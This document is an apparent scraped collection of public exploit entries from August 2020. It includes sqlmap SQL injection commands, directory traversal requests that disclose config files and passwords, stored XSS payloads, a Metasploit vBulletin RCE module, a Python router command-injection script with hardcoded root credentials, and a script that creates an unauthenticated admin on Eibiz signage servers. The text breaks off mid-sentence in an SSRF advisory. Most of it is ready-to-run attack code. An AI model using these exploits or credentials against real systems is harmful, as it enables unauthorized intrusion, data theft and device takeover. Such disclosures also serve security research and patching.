ISHACK AI BOT

# Title: Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection # Exploit Author: Moaaz Taha (0xStorm) # Date: 2020-08-18 # Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html # Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description This parameter "catId" is vulnerable to Time-Based blind SQL injection in this path "/medical/inventeries.php?catID=1" that leads to retrieve all databases. #POC sqlmap -u "http://TARGET/medical/inventeries.php?catID=1" -p catId --dbms=mysql --threads=10

# Exploit Title: Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal # Exploit Author: Tuygun # Date: 2020-08-19 # Vendor Homepage: https://www.ruijienetworks.com/ # Version: eWeb S29_RGOS 11.4(1)B12P11 # Source : https://faruktuygun.com/directorytraversal.html Proof of Concept Request: GET /download.do?file=../../../../config.text HTTP/1.1 Host: 192.168.2.160 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: LOCAL_LANG_COOKIE=en; UI_LOCAL_COOKIE=en; mac=0074.9c95.43f0; SID=33BA8206DE5B8B8295C89A3C4787D7A; module=network; subModule=certify; threeModule=certify_adv Connection: close Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 200 OK Date: Wed, 03 Jun 2020 20:52.25 GMT Server: HTTP-Server/1.1 Content-length: 2070 Content-Disposition: attachment; filename="config.text" Content-Type: application/octet-stream; Charset=UTF-8 version S29_RGOS 11.4(1)B12P11 hostname OMURGA ! no spanning-tree ! username admin password admin username ruijie privilege 15 201998 ! cwmp ! install 0 S2910C-24GT2XS-HP-E ! sysmac 0074.9C95.43f0 ! enable service web-server http enable service web-server https webmaster level 1 username ruijie password 201998 ! nfpp ! . . .

# Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated) # Google Dork: - # Date: 2020-08-17 # Exploit Author: İsmail ERKEK # Vendor Homepage: http://wiki.pnpscada.com/forumHome.jsp # Version: 2.200816204020 # Tested on: - 1. Description: ---------------------- PNPSCADA 2.200816204020 allows SQL Injection via parameter 'interf' in /browse.jsp. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from one of the affected pages with 'interf' parameter and save it like fuel.req Then run SQLmap to extract the data from the database: sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent 3. Example payload: ---------------------- (time-based blind) memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND 6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831 4. Burpsuite request: ---------------------- POST /browse.jsp HTTP/1.1 Host: 127.0.0.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: http://127.0.0.1/browse.jsp?memh=2510775194362297745&interf=115&replaceId=k1&multiple=yes Content-Type: application/x-www-form-urlencoded Content-Length: 93 Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37 memh=803509994960085058&searchStr=*&replaceId=k1&multiple=yes&interf=115*&page=1&mselect=98831 Best Regards. Ek alanı

# Exploit Title: ElkarBackup 1.3.3 - Persistent Cross-Site Scripting # Date: 2020-08-14 # Exploit Author: Enes Özeser # Vendor Homepage: https://www.elkarbackup.org/ # Version: 1.3.3 # Tested on: Linux 1- Go to following url. >> http://(HOST)/elkarbackup/login 2- Default username and password is root:root. We must know login credentials. 3- Go to "Jobs" and press "Add client" button. 4- Write XSS payload in "Name" section. 5- Press "Save" button. (( Executable XSS Payloads )) 1- "><script>alert('XSS Confirmed!');</script> 2- "><script>alert("XSS Confirmed!");</script> 3- "><script>alert(document.cookie);</script> 4- "><script>alert(document.domain);</script> (( REQUEST )) POST /elkarbackup/client/2 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://(HOST)/elkarbackup/client/2 Content-Type: application/x-www-form-urlencoded Content-Length: 358 Connection: close Cookie: PHPSESSID=dop3m1qj8c5octaxuasd21as2 Upgrade-Insecure-Requests: 1 Client%5Bname%5D=%22%3E%3Cscript%3Ealert%28%22XSS+Confirmed%21%22%29%3C%2Fscript%3E& Client%5Burl%5D=&Client%5Bquota%5D=-1&Client%5Bdescription%5D=&Client%5BisActive%5D=1& Client%5BmaxParallelJobs%5D=1&Client%5Bowner%5D=1&Client%5BsshArgs%5D=&Client%5BrsyncShortArgs%5D=& Client%5BrsyncLongArgs%5D=&Client%5B_token%5D=yrL8pXqx-sTVYhLQBpL523I-BOnSqoRyZnd5MUt2bfI

# Title: Complaint Management System 1.0 - 'cid' SQL Injection # Exploit Author: Mohamed Elobeid (0b3!d) # Date: 2020-08-21 # Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=14206&title=Complaint+Management+System # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description This parameter "cid" is vulnerable to Error-Based blind SQL injection in this path "/Complaint%20Management%20System/admin/complaint-details.php?cid=60" that leads to retrieve all databases. #POC sqlmap -u 'http://target/Complaint Management System/admin/complaint-details.php?cid=60' --cookie="PHPSESSID=bb4g25d3qceicepo7b3d26cfpp" --dbms=mysql --dbs

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'vBulletin 5.1.2 Unserialize Code Execution', 'Description' => %q{ This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9 }, 'Platform' => 'php', 'License' => MSF_LICENSE, 'Author' => [ 'Netanel Rubin', # reported by 'cutz', # original exploit 'Julien (jvoisin) Voisin', # metasploit module ], 'Payload' => { 'BadChars' => "\x22", }, 'References' => [ ['CVE', '2015-7808'], ['EDB', '38629'], ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'], ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/'] ], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Targeting', { 'auto' => true } ], ['vBulletin 5.0.X', {'chain' => 'vB_Database'}], ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}], ], 'DisclosureDate' => 'Nov 4 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]) ]) end def check begin res = send_request_cgi({ 'uri' => target_uri.path }) if (res && res.body.include?('vBulletin Solutions, Inc.')) if res.body.include?("Version 5.0") @my_target = targets[1] if target['auto'] return Exploit::CheckCode::Appears elsif res.body.include?("Version 5.1") @my_target = targets[2] if target['auto'] return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected end end rescue ::Rex::ConnectionError return Exploit::CheckCode::Safe end end def exploit print_status("Trying to inferprint the instance...") @my_target = target check_code = check unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable instance") end if @my_target.nil? || @my_target['auto'] fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end print_status("Exploiting #{@my_target.name}...") chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:' chain << @my_target["chain"].length.to_s chain << ':"' chain << @my_target["chain"] chain << '":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:' chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}" chain = Rex::Text.uri_encode(chain) chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'), 'vars_get' => { 'arguments' => chain }, 'encode_params' => false, }) end end

# Exploit Title: Seowon SlC 130 Router - Remote Code Execution # Author: maj0rmil4d - Ali Jalalat # Author website: https://secureguy.ir # Date: 2020-08-20 # Vendor Homepage: seowonintech.co.kr # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29 # CVE: CVE-2020-17456 # Version: Lync:Mac firmware 1.0.1, likely earlier versions # Tested on: Windows 10 - Parrot sec # Description: # user can run arbitrary commands on the router as root ! # as there are already some hardcoded credentials so there is an easy to trigger exploit # credentials : # user => VIP # pwd => V!P83869000 # user => Root # pwd => PWDd0N~WH*4G#DN # user => root # pwd => gksrmf28 # user => admin # pwd => admin # # A write-up can be found at: # https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/ import requests import sys host = sys.argv[1] session = requests.Session() header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0", "Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8", "Accept-Language": "en-US,en;q:0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "pplication/x-www-form-urlencoded", "Content-Length": "132", "Origin": "http://192.168.1.1", "Connection": "close", "Referer": "http://192.168.1.1/", "Upgrade-Insecure-Requests": "1" } datas = { "Command":"Submit", "expires":"Wed%2C+12+Aug+2020+15%3A20%3A05+GMT", "browserTime":"081119502020", "currentTime":"1597159205", "user":"admin", "password":"admin" } #auth session.post(host+"/cgi-bin/login.cgi" , headers=header , data = datas) #rce cmd = sys.argv[2] rce_data = { "Command":"Diagnostic", "traceMode":"ping", "reportIpOnly":"", "pingIpAddr":";".encode("ISO-8859-1").decode()+cmd, "pingPktSize":"56", "pingTimeout":"30", "pingCount":"4", "maxTTLCnt":"30", "queriesCnt":"3", "reportIpOnlyCheckbox":"on", "btnApply":"Apply", "T":"1597160664082" } rce = session.post(host+"/cgi-bin/system_log.cgi" , headers=header , data = rce_data) print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])

# Exploit Title: LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting # Date: 2020-08-23 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.limesurvey.org # Version: LimeSurvey 4.3.10+200812 # Tested on: Ubuntu 18.04.4 # Patch Link: https://github.com/LimeSurvey/LimeSurvey/commit/3712854a8fd8d875c67640969a1d54c4d93d3676 # Vulnerability Details Description : A stored cross-site scripting vulnerability exists within the "Survey Menu" functionality of the LimeSurvey administration panel. Vulnerable Parameters : Surveymenu[parent_id] # POC # Request 1 : Create a survey menu with the Surveymenu[title] parameter set to an XSS payload. POST /limesurvey/index.php/admin/menus/sa/update/id/ HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 524 Origin: http://TARGET Connection: close Referer: http://TARGET/limesurvey/index.php/admin/menus/sa/view Cookie: LS-MRZROBQAFECYWCMT=v1ac49ivhs7bb5ocb8sqc7oq51; YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D&Surveymenu%5Bparent_id%5D=&Surveymenu%5Bsurvey_id%5D=&Surveymenu%5Buser_id%5D=&Surveymenu%5Bordering%5D=0&Surveymenu%5Bshowincollapse%5D=0&Surveymenu%5Bname%5D=realmenu&Surveymenu%5Btitle%5D=%3Csvg%2Fonload%3Dalert(1)%3E&Surveymenu%5Bdescription%5D=XSS+Test&Surveymenu%5Bposition%5D=side&Surveymenu%5Bchanged_by%5D=1&Surveymenu%5Bchanged_at%5D=2020-08-15+20%3A40%3A10&Surveymenu%5Bcreated_by%5D=1&Surveymenu%5Bid%5D= # Request 2 : Create a survey menu with the Surveymenu[parent_id] parameter set to the survey id from the previous request. The XSS payload will be triggered by this survey menu. POST /limesurvey/index.php/admin/menus/sa/update/id/ HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 505 Origin: http://TARGET Connection: close Referer: http://TARGET/limesurvey/index.php/admin/menus/sa/view Cookie: LS-MRZROBQAFECYWCMT=v1ac49ivhs7bb5ocb8sqc7oq51; YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D&Surveymenu%5Bparent_id%5D=11&Surveymenu%5Bsurvey_id%5D=&Surveymenu%5Buser_id%5D=5&Surveymenu%5Bordering%5D=1&Surveymenu%5Bshowincollapse%5D=0&Surveymenu%5Bname%5D=xssmenu&Surveymenu%5Btitle%5D=XSS+Test&Surveymenu%5Bdescription%5D=XSS+Test&Surveymenu%5Bposition%5D=side&Surveymenu%5Bchanged_by%5D=1&Surveymenu%5Bchanged_at%5D=2020-08-15+20%3A42%3A58&Surveymenu%5Bcreated_by%5D=1&Surveymenu%5Bid%5D=

# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass # Date: 2020-08-21 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.eibiz.co.th # Version: <=3.8.0 # CVE: N/A #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin) # # # Vendor: EIBIZ Co.,Ltd. # Product web page: http://www.eibiz.co.th # Affected version: <=3.8.0 # # Summary: EIBIZ develop advertising platform for out of home media in that # time the world called "Digital Signage". Because most business customers # still need get outside to get in touch which products and services. Online # media alone cannot serve them right place, right time. # # Desc: The application suffers from unauthenticated privilege escalation and # arbitrary user creation vulnerability that allows authentication bypass. # Once serialized, an AMF encoded object graph may be used to persist and retrieve # application state or allow two endpoints to communicate through the exchange # of strongly typed data. These objects are received by the server without validation # and authentication and gives the attacker the ability to create any user with # any role and bypass the security control in place and modify presented data on # the screen/billboard. # # ========================================================================================= # # # python3 imedia_createUser.py 192.168.1.1 waddup # # --Sending serialized object... # --Replaying... # # ------------------------------------------------------ # Admin user 'waddup' successfully created. No password. # ------------------------------------------------------ # # ========================================================================================= # # Tested on: Windows Server 2016 # Windows Server 2012 R2 # Windows Server 2008 R2 # Apache Flex # Apache Tomcat/6.0.14 # Apache-Coyote/1.1 # BlazeDS Application # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5586 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php # # # 26.07.2020 # # import time as go import requests import sys import re class __CreateAdmin__: def __init__(self): self.ep = "/messagebroker/amf" self.agent = "CharlieChaplin" self.amfpacket = None self.bytecount = None self.bytesdata = None self.address = None self.headers = None self.usrname = None self.ende = None def usage(self): if len(sys.argv) != 3: self.me() msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin" brd = "-" * len(msg + "\x20") print("\n" + brd) print(msg) print("\x20Usage: ./i-media.py [ip] [username]") print(brd) exit(12) else: self.address = sys.argv[1] self.usrname = sys.argv[2] if not "http" in self.address: self.address = "http://{}".format(self.address) def amf(self): self.headers = {"User-Agent" : self.agent, "Accept" : "*/*", "Accept-Language" : "en-US,en;q=0.5", "Accept-Encoding" : "gzip, deflate", "Origin" : self.address, "Connection" : "close", "Referer" : self.address + "/main.swf", "Content-Type" : "application/x-amf"} self.amfpacket = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E" self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00" self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11" self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E" self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67" self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73" self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67" self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73" self.amfpacket += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65" self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69" self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62" self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E" self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65" self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F" self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74" self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D" self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01" self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55" self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A" self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64" self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70" self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63" self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C" self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65" self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D" self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64" self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75" self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65" self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09" self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64" self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F" self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06" self.amfpacket += b"\x01\x06\x01\x06" ##################" self.bytecount = len(self.usrname * 2) + 1 self.bytesdata = [self.bytecount] self.amfpacket += "".join(map(chr, self.bytesdata)) self.amfpacket += (bytes(self.usrname.encode("utf-8"))) self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06" self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69" self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06" self.amfpacket += b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44" self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74" self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09" self.amfpacket += b"\x44\x53\x49\x64\x06\x49\x39\x36\x42" self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31" self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31" self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33" self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00" self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72" self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46" self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38" self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41" self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45" self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########" print("\n--Sending serialized object...") req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket) #print(req.text.encode("utf-8")) go.sleep(2) print("--Replaying...") req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket) #print(req.text.encode("utf-8")) self.ende = "Admin user '" + self.usrname + "' successfully created. No password." print print("-" * len(self.ende)) print(self.ende) print("-" * len(self.ende)) def me(self): cc = """ /`,.,,,. :.......,, ,.........7 ,.........$ ......:=+=$ I.....,,:~,.: $.?7IZDDNNN~. $$: 8D=:I D, D~,7NI7DNN DDD NNN: D8.ININ; D8?7DZS .ZDNNND D S..,.~8?,N OO77 N......,..$=77:+?=~8 :......,::=.I8?:+=.=+~++ =.......,:+$=+O:+==~~++++= 8...........~7D$::~..~====:++ I.............:+.....~~~=~:~+? N,............. .+...,:~=+~~ :+=$ ;....... ......, .,....,:=+:,..~=? Z,,...... :............,::~~=...===I =.......$ Z...... =~,,,,.,:~,...,7~= +....... 8.....,.=~~~:.~~~=:~ ..:$== ,...... +,..,,:.=~:~+I:,+I=8:...=?~ ,....., =...,,,8+=,:~=~I=~~ N...:+? ,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=? 8...... ,...7=Z$DN:?::=I~~$ =..,=+ ...,..D ,....O88D,8D,:=:==+?? ...,:7 ,....7 ,..:$Z8D8=8DZ~~=~+==? :..:~+ ......8D .. .... :?~8D:.:~~=++ ..,~II :....~D+: . . . ..,..==~===N +,.,=$ ,. DDND.......... .,...,===+=N ..,+?Z DD 88 .......... ....,..~+=~N ..,~?I ....... ,,.,,.:...=?? 8..~=I$ ....... ...,,,,. ,:~= ..:=~? ........ ,.,,..,:.. I.:+?+D ....... .......,:,,8 ,..IN ........ .,.. ..,,:.: :8N ........ ... ..,::,, I+O ........ ......,:,. O.ZN ........ . . ...,,,,. D+ ............ ....,,,. = ....... . ....,,, ? ....... .....,,, 7 ...... . ..,,,, + :..... ..,.,, 8 :....... =. .....,,,N 8 ~....... D. .....,,,D 8 ~....... D. . ...,,,O D =.... .....,,Z ?` +...... . :........,.$ + I...... ........,.7 = Z........ . . ....,,7 D N..... ... . ........I 8 ..... ... , ........I 8 ...... . = .. .....I 7 :.. . ..7 8... .....I ? Z.. D .. ....7 N NND88OOOOOOO88DN O.. . .. ....O O D8OZ$77II777$$ZO8DN ... . .. . .....N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN .,. ....O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N $.. ...88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN ... ... ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N =.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN ... .?, I777IIIIIIIII7$~O8N NNNNN 8.... .I. ...7IIIIII7$Z8DD NNNNN NND=....~,=~ ...+I . . ..I$$ZO8DN NN NNNNN N.+?~.~,=~=... ... $O.. . ...~:..=IINN $NNN ?,:..:,.=N I.....,,=I+ N8 ~....,8 """ j = 0 while j < len(cc): char = cc[j] sys.stdout.write(char) go.sleep(10.0 / 100000.0) j = j + 1 def main(self): self.usage() self.amf() if __name__ == '__main__': __CreateAdmin__().main()

# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure # Date: 2020-08-21 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.eibiz.co.th # Version: <=3.8.0 # CVE: N/A Eibiz i-Media Server Digital Signage 3.8.0 Configuration Disclosure Vendor: EIBIZ Co.,Ltd. Product web page: http://www.eibiz.co.th Affected version: <=3.8.0 Summary: EIBIZ develop advertising platform for out of home media in that time the world called "Digital Signage". Because most business customers still need get outside to get in touch which products and services. Online media alone cannot serve them right place, right time. Desc: i-Media Server is vulnerable to unauthenticated configuration disclosure when direct object reference is made to the SiteConfig.properties file using an HTTP GET method. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access. Tested on: Windows Server 2016 Windows Server 2012 R2 Windows Server 2008 R2 Apache Flex Apache Tomcat/6.0.14 Apache-Coyote/1.1 BlazeDS Application Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5583 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5583.php 26.07.2020 -- $ curl http://192.168.1.1/config/SiteConfig.properties server.mode=testing admin.username=admin admin.password=admin designer.username=designer designer.password=designer reporter.username=reporter reporter.password=reporter db.PriDBServerIp=127.0.0.1 db.PriDBServerPort=3306 db.PriDBServerUser=root db.PriDBServerPwd=eibiz1234 db.PriDBName=imediadb account.appId=1 account.RootPath=C:/iMediaServWeb/tomcat/webapps/ROOT/ account.ContentPath=C:/iMediaServWeb/tomcat/webapps/ROOT/ account.imediasuitURL=http://localhost:8080/UserAPI/v1/user/applogin account.ReportInteractive=0 account.ReportPlayer=1 account.ReportMedia=1 account.ReportTransfer=1 ConcurrentDownload=10 BindingAddress=192.168.1.1 ServicePort=643 EndPointPort=644 AndroidServicePort=8080 AndroidEndPointPort=8081 RequireApprove= OutgoingMailServer= MailUser= MailPassword= mongodb.PriMongoDBName=imediadb_sandbox mongodb.PriMongoDBServerIp=localhost mongodb.PriMongoDBServerPort=27017 mongodb.PriMongoDBUser= mongodb.PriMongoDBPwd=

# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal # Date: 2020-08-22 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.eibiz.co.th # Affected version: <=3.8.0 # CVE: N/A Eibiz i-Media Server Digital Signage 3.8.0 (oldfile) File Path Traversal Vendor: EIBIZ Co.,Ltd. Product web page: http://www.eibiz.co.th Affected version: <=3.8.0 Summary: EIBIZ develop advertising platform for out of home media in that time the world called "Digital Signage". Because most business customers still need get outside to get in touch which products and services. Online media alone cannot serve them right place, right time. Desc: i-Media Server is affected by a directory traversal vulnerability. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the 'oldfile' GET parametery. Tested on: Windows Server 2016 Windows Server 2012 R2 Windows Server 2008 R2 Apache Flex Apache Tomcat/6.0.14 Apache-Coyote/1.1 BlazeDS Application Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5585 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5585.php 26.07.2020 -- $ curl "http://192.168.1.1/dlibrary/null?oldfile=../../WEB-INF/web.xml&library=null" $ curl "http://192.168.1.1/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null" ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1

# Exploit Title: Ericom Access Server x64 9.2.0 - Server-Side Request Forgery # Date: 2020-08-22 # Exploit Author: hyp3rlinx # Vendor Homepage: www.ericom.com # Version: Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0 # CVE: CVE-2020-24548 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ERICOM-ACCESS-SERVER-ACCESS-NOW-BLAZE-9.2.0-SERVER-SIDE-REQUEST-FORGERY.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.ericom.com [Product] Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0 AccessNow is an HTML5 remote desktop gateway that works from any device with an HTML5 compatible browser, including from Chromebooks and locked down devices. Ericom Blaze provides remote desktop connectivity from Mac, Windows and Linux devices to applications on office / home PCs and virtual desktops (VDI). [Vulnerability Type] Server Side Request Forgery [CVE Reference] CVE-2020-24548 [Security Issue] Ericom Access Server allows attackers to initiate SSRF requests making outbound connections to arbitrary hosts and TCP ports. Attackers, who can reach the AccessNow server can target internal systems that are behind firewalls that are typically not accessible. This can also be used to target third-party systems from the AccessNow server itself. The AccessNow server will return an attacker friendly response, exfiltrating which ports are listening for connections. This can bypass Firewall rules and undermine the integrity of other systems and security controls in place. E.g. listen using Netcat, Nc64.exe -llvp 25 A) Ericom Server 192.168.88.152 (defaults port 8080) B) Attacker 192.168.88.162 C) Victim 192.168.1.104 Using Wireshark we can observe A sends a SYN packet to C (port 25) C sends SYN/ACK to A A sends ACK to C. A sends ACK/FIN to C port 25. We will then get an AccessNow server response similar to below. ["C","M",["Cannot connect to '192.168.1.104:25'.",true]] This message indicates we cannot connect and helpfully informs us of closed vs open ports. [Affected Component] Ericom Server port 8080 will forward connections to arbitrary Hosts and or Ports which are sent using Web-Socket requests. Ericom server then replies with a 